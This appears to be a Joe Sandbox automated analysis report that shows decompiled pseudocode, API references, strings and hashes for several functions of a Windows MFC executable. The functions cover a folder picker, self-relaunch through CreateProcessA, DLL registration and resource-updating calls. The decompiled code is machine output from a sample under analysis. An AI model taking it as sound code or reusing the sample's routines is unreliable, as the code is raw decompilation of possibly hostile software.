Instruction Fuzzy Hash: F721DB79645124BBDB209761EC4DFEF3BBCDF86771F400176B605D21C0D6748A41CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00427FB3, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00427FB3(void* __ecx, void* __eflags) {
				void* _t33;
				intOrPtr* _t36;
				intOrPtr* _t38;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t51;
				void* _t53;

				E0043E4E0(0x442ebc, _t53);
				_t51 = __ecx;
				memset(_t53 - 0x34, 0, 0x20);
				E00429029(_t53 - 0x10, 0xe06f);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				 *((intOrPtr*)(_t53 - 0x2c)) = _t53 - 0x138;
				 *(_t53 - 0x34) =  *(_t51 + 0x20);
				 *((intOrPtr*)(_t53 - 0x28)) =  *((intOrPtr*)(_t53 - 0x10));
				_t33 = _t53 - 0x34;
				 *((intOrPtr*)(_t53 - 0x24)) = 0x41;
				__imp__SHBrowseForFolderA(_t33, _t47, _t50);
				_t48 = _t33;
				if(_t48 != 0) {
					__imp__SHGetPathFromIDListA(_t48, _t53 - 0x138);
					__imp__SHGetMalloc(_t53 - 0x14);
					_t36 =  *((intOrPtr*)(_t53 - 0x14));
					 *((intOrPtr*)( *_t36 + 0x14))(_t36, _t48);
					_t38 =  *((intOrPtr*)(_t53 - 0x14));
					 *((intOrPtr*)( *_t38 + 8))(_t38);
					_t33 = _t53 - 0x138;
					_push(_t33);
					_push(0x494);
					L0043E066();
					L0043E15C();
				}
				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t33;
			}

0x00427fb8
0x00427fcc
0x00427fcf
0x00427fdd
0x00427feb
0x00427fef
0x00427ff5
0x00427ffb
0x00427ffe
0x00428002
0x00428009
0x0042800f
0x00428013
0x0042801d
0x00428027
0x0042802d
0x00428034
0x00428037
0x0042803d
0x00428040
0x00428048
0x00428049
0x0042804e
0x00428055
0x00428055
0x0042805a
0x00428061
0x0042806b
0x00428073

APIs

__EH_prolog.LIBCMT ref: 00427FB8
memset.MSVCRT ref: 00427FCF

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

SHBrowseForFolderA.SHELL32(?), ref: 00428009
SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0042801D
SHGetMalloc.SHELL32(?), ref: 00428027
#3092.MFC42(00000494,?), ref: 0042804E
#6199.MFC42(00000494,?), ref: 00428055
#800.MFC42 ref: 00428061

Strings

A, xrefs: 00428002

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1168#3092#537#6199#800BrowseFolderFromH_prologListLoadMallocPathStringmemset
String ID: A
API String ID: 3241221674-3554254475
Opcode ID: ad8a5b0b3f746c3d6c02df60094eecce03406a51a92a44c67c1fcb0cd6ac5004
Instruction ID: f04a0cf993f65f4a15d9dfe7e6fd1065995f3679dd8ec938bbeaed0052bf45f2
Opcode Fuzzy Hash: ad8a5b0b3f746c3d6c02df60094eecce03406a51a92a44c67c1fcb0cd6ac5004
Instruction Fuzzy Hash: 7A218E75A00219AFCB10EBA5D949FEEBBB8EF49304F10006AF515E3281EB749A04CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00427AD1, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57
processCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00427AD1(void* __eflags) {
				void* _t21;
				void* _t36;

				E0043E4E0(0x442de0, _t36);
				E0042A660(_t36 - 0x16c, 1, 0);
				_t21 = _t36 - 0x16c;
				_push(_t21);
				L0043DE26();
				_push(" u");
				_push(_t21);
				 *(_t36 - 4) = 0;
				_push(_t36 - 0x10);
				L0043DE20();
				 *(_t36 - 4) = 2;
				L0043DD36();
				memset(_t36 - 0x68, 0, 0x44);
				 *(_t36 - 0x68) = 0x44;
				if(CreateProcessA(0,  *(_t36 - 0x10), 0, 0, 0, 0, 0, 0, _t36 - 0x68, _t36 - 0x24) != 0) {
					_push(1);
					_pop(0);
				}
				 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return 0;
			}

0x00427ad6
0x00427aee
0x00427af6
0x00427aff
0x00427b00
0x00427b05
0x00427b0a
0x00427b0e
0x00427b11
0x00427b12
0x00427b1a
0x00427b1e
0x00427b2a
0x00427b35
0x00427b53
0x00427b55
0x00427b57
0x00427b57
0x00427b58
0x00427b5f
0x00427b6a
0x00427b72

APIs

__EH_prolog.LIBCMT ref: 00427AD6

Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0

#537.MFC42(?), ref: 00427B00
#924.MFC42(?,00000000,00454CC4,?), ref: 00427B12
#800.MFC42(?,00000000,00454CC4,?), ref: 00427B1E
memset.MSVCRT ref: 00427B2A
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,00454CC4,?), ref: 00427B4B
#800.MFC42 ref: 00427B5F

Strings

D, xrefs: 00427B35
-D, xrefs: 00427AD1

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800lstrlen$#537#924CreateFileH_prologModuleNameProcesslstrcatmemset
String ID: D$-D
API String ID: 188053718-3265099219
Opcode ID: ab16a09673d85046ecfb18f85d8818620d30168adb8cbf54d4a41f7c9eeec40d
Instruction ID: ddce2532d2edbd1f10bf0b2a166f424bc540c65713c09e694a42de7bf5785289
Opcode Fuzzy Hash: ab16a09673d85046ecfb18f85d8818620d30168adb8cbf54d4a41f7c9eeec40d
Instruction Fuzzy Hash: 7F117CB1D01228AADB20EBA1DD4AFDFBB7CAF19348F00015AB515A7180E7785608CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00426D6B, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00426D6B(void* __eflags, intOrPtr _a4) {
				char _v264;
				_Unknown_base(*)()* _t9;
				void* _t10;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t15;

				E0042A660( &_v264, 3, 0);
				_t15 = LoadLibraryA( &_v264);
				if(_t15 == 0) {
					L5:
					return 0;
				}
				__imp__CoInitialize(0);
				if(_a4 == 0) {
					_t9 = GetProcAddress(_t15, "DllUnregisterServer");
					if(_t9 != 0) {
						 *_t9();
					}
					_t10 = 1;
					return _t10;
				}
				_t12 = GetProcAddress(_t15, "DllRegisterServer");
				if(_t12 != 0) {
					 *_t12();
				}
				FreeLibrary(_t15);
				__imp__CoFreeUnusedLibraries();
				__imp__CoUninitialize();
				goto L5;
			}

0x00426d80
0x00426d95
0x00426d99
0x00426dce
0x00000000
0x00426dce
0x00426d9d
0x00426da7
0x00426ddb
0x00426de3
0x00426de5
0x00426de5
0x00426de9
0x00000000
0x00426de9
0x00426daf
0x00426db7
0x00426db9
0x00426db9
0x00426dbc
0x00426dc2
0x00426dc8
0x00000000

APIs

Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0

LoadLibraryA.KERNEL32(?), ref: 00426D8F
CoInitialize.OLE32(00000000), ref: 00426D9D
GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00426DAF
FreeLibrary.KERNEL32(00000000), ref: 00426DBC
CoFreeUnusedLibraries.OLE32 ref: 00426DC2
CoUninitialize.OLE32 ref: 00426DC8
GetProcAddress.KERNEL32(00000000,DllUnregisterServer), ref: 00426DDB

Strings

DllRegisterServer, xrefs: 00426DA9
DllUnregisterServer, xrefs: 00426DD5

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressFreeLibraryProclstrlen$FileInitializeLibrariesLoadModuleNameUninitializeUnusedlstrcat
String ID: DllRegisterServer$DllUnregisterServer
API String ID: 3512499333-2931954178
Opcode ID: 40e153b43624e0da37c66a28ff56e30f897e653333b082af74b7c8fb72283976
Instruction ID: a7167bb22e29533f7d34f5b3ce43aed0af18d597626619e511e2975e1d6da5d4
Opcode Fuzzy Hash: 40e153b43624e0da37c66a28ff56e30f897e653333b082af74b7c8fb72283976
Instruction Fuzzy Hash: 22F0A4757506286BD3116FB1BC0EB9A366C9F91756F420031F902E6190DBB88A84C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041C67B, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C67B(intOrPtr* __ecx) {
				struct HINSTANCE__* _t15;
				intOrPtr* _t24;

				_t24 = __ecx;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((short*)(__ecx + 0xc)) = 0x419;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				L0043DDD8();
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				_t15 = LoadLibraryA("KERNEL32.DLL");
				 *(_t24 + 8) = _t15;
				if(_t15 != 0) {
					 *((intOrPtr*)(_t24 + 0x10)) = GetProcAddress(_t15, "BeginUpdateResourceA");
					 *((intOrPtr*)(_t24 + 0x18)) = GetProcAddress( *(_t24 + 8), "EndUpdateResourceA");
					 *((intOrPtr*)(_t24 + 0x14)) = GetProcAddress( *(_t24 + 8), "UpdateResourceA");
				}
				return _t24;
			}

0x0041c67c
0x0041c684
0x0041c686
0x0041c689
0x0041c68c
0x0041c692
0x0041c695
0x0041c698
0x0041c69b
0x0041c6a5
0x0041c6a8
0x0041c6b0
0x0041c6b3
0x0041c6c8
0x0041c6d5
0x0041c6dd
0x0041c6dd
0x0041c6e4

APIs

#540.MFC42(?,?,0041C61B), ref: 0041C69B
LoadLibraryA.KERNEL32(KERNEL32.DLL,?,?,0041C61B), ref: 0041C6A8
GetProcAddress.KERNEL32(00000000,BeginUpdateResourceA), ref: 0041C6C1
GetProcAddress.KERNEL32(?,EndUpdateResourceA), ref: 0041C6CE
GetProcAddress.KERNEL32(?,UpdateResourceA), ref: 0041C6DB

Strings

BeginUpdateResourceA, xrefs: 0041C6BB
EndUpdateResourceA, xrefs: 0041C6C3
UpdateResourceA, xrefs: 0041C6D0
KERNEL32.DLL, xrefs: 0041C6A0

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$#540LibraryLoad
String ID: BeginUpdateResourceA$EndUpdateResourceA$KERNEL32.DLL$UpdateResourceA
API String ID: 1020995900-339194613
Opcode ID: f1a27755b19c0f7fc21b24e88ca79110459ea58574f41d5bc01a83055e454a45
Instruction ID: 27f285e7a3129734e9f490c22c25d06d0a5874f884a0a5284f684dc97de8e30d
Opcode Fuzzy Hash: f1a27755b19c0f7fc21b24e88ca79110459ea58574f41d5bc01a83055e454a45
Instruction Fuzzy Hash: AA011DB4500B009F83309F27E845517FBF4EFE5705311491FD496C7A61D7B4A589CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004034B3, Relevance: 15.1, APIs: 10, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E004034B3(intOrPtr* __ecx) {
				intOrPtr _t92;
				void* _t110;
				intOrPtr* _t111;
				void* _t149;
				intOrPtr* _t150;
				void* _t152;
				intOrPtr* _t153;
				intOrPtr _t154;
				void* _t156;
				void* _t158;

				E0043E4E0(E0043EE96, _t156);
				_t111 = __ecx;
				 *((intOrPtr*)(_t156 - 0x10)) = _t158 - 0x310;
				L0043DD4E();
				_t153 =  *((intOrPtr*)(_t156 + 8));
				 *(_t156 - 4) =  *(_t156 - 4) & 0x00000000;
				 *(_t156 - 4) = 1;
				 *((intOrPtr*)( *_t153 + 0x34))(_t152, _t110);
				_t150 =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)( *_t150 + 0x40))();
				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
				L0043DD48();
				L0043DD4E();
				 *(_t156 - 4) = 4;
				 *(_t156 - 4) = 5;
				L0043DE38();
				 *((intOrPtr*)(_t156 - 0x198)) = __ecx;
				E00403209(_t156 - 0x31c);
				 *((intOrPtr*)(_t156 - 0x198)) = _t156 - 0x31c;
				L0042D1F0(_t156 - 0x198, _t156 - 0x198, _t156 - 0x198, 0x1001, 0x20, _t149);
				 *((intOrPtr*)(_t156 - 0x174)) = 2;
				L0042D530(_t156 - 0x198);
				 *((intOrPtr*)( *_t111 + 0x2c))(_t156 - 0x198);
				 *((intOrPtr*)( *_t153 + 0x2c))();
				 *((intOrPtr*)( *_t153 + 0x14))();
				L0042D700(_t156 - 0x198, _t156 - 0x198, _t156 - 0x198, _t156 - 0x198, _t156 - 0x198, 0);
				 *((intOrPtr*)( *_t111 + 0x2c))(_t156 - 0x198, 1);
				 *((intOrPtr*)( *_t150 + 0x14))(_t156 - 0x198, 1);
				 *((intOrPtr*)( *_t150 + 0x18))(_t156 - 0x198);
				while(1) {
					_t92 =  *_t153;
					_push(_t156 - 0x198);
					if( *((intOrPtr*)(_t156 - 0xc0)) >=  *((intOrPtr*)(_t156 - 0x17c))) {
						break;
					}
					 *((intOrPtr*)( *_t150 + 0x20))(_t156 - 0x198,  *((intOrPtr*)(_t153 + 0xc)),  *((intOrPtr*)(_t92 + 0x1c))());
				}
				 *((intOrPtr*)(_t92 + 0x18))();
				 *((intOrPtr*)( *_t150 + 0x1c))(_t156 - 0x198);
				L0042D260(_t156 - 0x198);
				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
				L0043DD48();
				L0043DE2C();
				L0043DD4E();
				 *(_t156 - 4) = 7;
				 *(_t156 - 4) = 8;
				 *((intOrPtr*)( *_t153 + 0x3c))(_t156 - 0x198, _t156 - 0x198);
				 *((intOrPtr*)( *_t150 + 0x48))();
				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
				L0043DD48();
				E0040378A(_t111, _t156 - 0x14);
				_t154 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t156 - 0x14)) - 8)) != 0) {
					_t154 = 2;
				}
				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0xc));
				return _t154;
			}

0x004034b8
0x004034c5
0x004034cb
0x004034ce
0x004034d3
0x004034d6
0x004034e0
0x004034e4
0x004034e7
0x004034f3
0x004034f6
0x004034fa
0x00403502
0x0040350d
0x0040351a
0x0040351e
0x00403523
0x0040352e
0x00403539
0x00403546
0x00403551
0x0040355c
0x00403570
0x0040357e
0x0040358c
0x00403596
0x004035a9
0x004035b9
0x004035c7
0x004035ca
0x004035dc
0x004035de
0x004035e1
0x00000000
0x00000000
0x004035f5
0x004035f5
0x004035fa
0x00403608
0x00403612
0x00403617
0x0040361c
0x0040362d
0x00403635
0x0040363c
0x00403645
0x00403649
0x00403650
0x00403653
0x00403657
0x00403662
0x0040366a
0x0040366f
0x00403671
0x00403671
0x00403675
0x0040367c
0x00403689
0x00403692

APIs

__EH_prolog.LIBCMT ref: 004034B8
#268.MFC42 ref: 004034CE
#1567.MFC42 ref: 004034FA
#268.MFC42 ref: 00403502
#909.MFC42(?), ref: 0040351E
#1567.MFC42 ref: 0040361C
#5628.MFC42(?), ref: 0040362D
#268.MFC42(?), ref: 00403635
#1567.MFC42 ref: 00403657
#800.MFC42 ref: 0040367C

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1567#268$#5628#800#909H_prolog
String ID:
API String ID: 2151629037-0
Opcode ID: b0b430a165b619de49a252735c073abdae3da5fd9b9f66aa43febc90b88111ea
Instruction ID: 268a258aaf44dd5b462995fc4df9fcd22a292b37963de6475e019a9a91cb9d6c
Opcode Fuzzy Hash: b0b430a165b619de49a252735c073abdae3da5fd9b9f66aa43febc90b88111ea
Instruction Fuzzy Hash: 3E518C71A10118DFCB28DF64D899AEDB7B8AF48314F20419EF51AA7291DF389E84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB74, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0041BB74(void* __ecx, void* __eflags) {
				intOrPtr _t28;
				void* _t54;
				void* _t77;
				intOrPtr _t78;

				_t77 = __ecx;
				_t28 =  *((intOrPtr*)(__ecx + 0x60));
				 *((intOrPtr*)(__ecx + 0x178)) =  *((intOrPtr*)(_t28 + 0x66c));
				 *((intOrPtr*)(__ecx + 0x17c)) =  *((intOrPtr*)(_t28 + 0x670));
				 *((intOrPtr*)(__ecx + 0x180)) =  *((intOrPtr*)(_t28 + 0x674));
				L0043DF94();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x360) & 0x000000ff);
				_push(0x46a);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x362) & 0x000000ff);
				_push(0x46d);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x365) & 0x000000ff);
				_push(0x46e);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x364) & 0x000000ff);
				_push(0x46f);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x366) & 0x000000ff);
				_push(0x470);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x367) & 0x000000ff);
				_push(0x473);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x363) & 0x000000ff);
				_push(0x474);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x14f) & 0x000000ff);
				_push(0x497);
				L0043DF82();
				asm("sbb ecx, ecx");
				_push( ~( *( *((intOrPtr*)(__ecx + 0x60)) + 0x140)) + 0x47d);
				_push(0x47d);
				_push(0x47c);
				L0043E072();
				E0041BE8F(E0041BE71(E0041BEC8(0x47d, __ecx), _t77), _t77);
				_t76 = _t77 + 0x64;
				E0040CF63(_t77 + 0x64, 0x323232, 1);
				if(_t77 != 0) {
					_t78 =  *((intOrPtr*)(_t77 + 0x20));
				} else {
					_t78 = 0;
				}
				E0040CF2E(_t76, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t78);
				_t54 = 1;
				return _t54;
			}

0x0041bb75
0x0041bb78
0x0041bb81
0x0041bb8d
0x0041bb9b
0x0041bba1
0x0041bbb2
0x0041bbb3
0x0041bbb8
0x0041bbc9
0x0041bbca
0x0041bbcf
0x0041bbe0
0x0041bbe1
0x0041bbe6
0x0041bbf7
0x0041bbf8
0x0041bbfd
0x0041bc0e
0x0041bc0f
0x0041bc14
0x0041bc25
0x0041bc26
0x0041bc2b
0x0041bc3c
0x0041bc3d
0x0041bc42
0x0041bc53
0x0041bc54
0x0041bc59
0x0041bc6e
0x0041bc72
0x0041bc73
0x0041bc74
0x0041bc7b
0x0041bc90
0x0041bc95
0x0041bca1
0x0041bcaa
0x0041bcb0
0x0041bcac
0x0041bcac
0x0041bcac
0x0041bcc5
0x0041bccc
0x0041bccf

APIs

#4710.MFC42 ref: 0041BBA1
#1779.MFC42(0000046A,?), ref: 0041BBB8
#1779.MFC42(0000046D,?,0000046A,?), ref: 0041BBCF
#1779.MFC42(0000046E,?,0000046D,?,0000046A,?), ref: 0041BBE6
#1779.MFC42(0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BBFD
#1779.MFC42(00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC14
#1779.MFC42(00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC2B
#1779.MFC42(00000474,?,00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC42
#1779.MFC42(00000497,?,00000474,?,00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC59
#1783.MFC42(0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D), ref: 0041BC7B

Part of subcall function 0041BEC8: #4055.MFC42(00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BED1
Part of subcall function 0041BEC8: #3092.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEE5
Part of subcall function 0041BEC8: #2642.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEEC
